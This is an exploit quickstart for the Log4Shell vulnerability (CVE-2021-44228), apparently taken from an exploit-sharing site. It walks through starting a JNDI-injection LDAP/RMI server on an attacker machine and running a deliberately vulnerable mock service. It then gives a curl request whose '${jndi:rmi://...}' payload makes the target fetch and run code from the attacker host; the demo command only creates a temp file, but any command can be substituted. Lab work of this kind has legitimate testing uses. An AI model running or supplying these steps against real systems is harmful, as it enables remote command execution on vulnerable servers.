Share
## https://sploitus.com/exploit?id=3B7408B1-9041-550E-9CB8-83E5F609C37B
# cve-2021-44228-log4j
[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228)
---
# Quickstart
### Concept
- Attacker Server IP: 172.18.5.189
- PRD Server IP: 172.18.5.191
### Step1: Start LDAP/RMI Services. [On Attacker Server]
Download Jar: [JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](./jar/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)
Start Services.
```sh
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"
```
Output:

### Step2: Mock a PRD Service. [On PRD Server]
Download Jar: [log4jRCE-0.0.1-SNAPSHOT.jar](jar/log4jRCE-0.0.1-SNAPSHOT.jar)
Run Services.
```sh
java -jar log4jRCE-0.0.1-SNAPSHOT.jar
```
Service run on 8080. This Service will logging whatever be sent to `/login` API.

### Step3: Make a request to PRD Service. [Any Servers]
```sh
curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'
```
Result:

Temp file has been created.

# Reference
- [welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)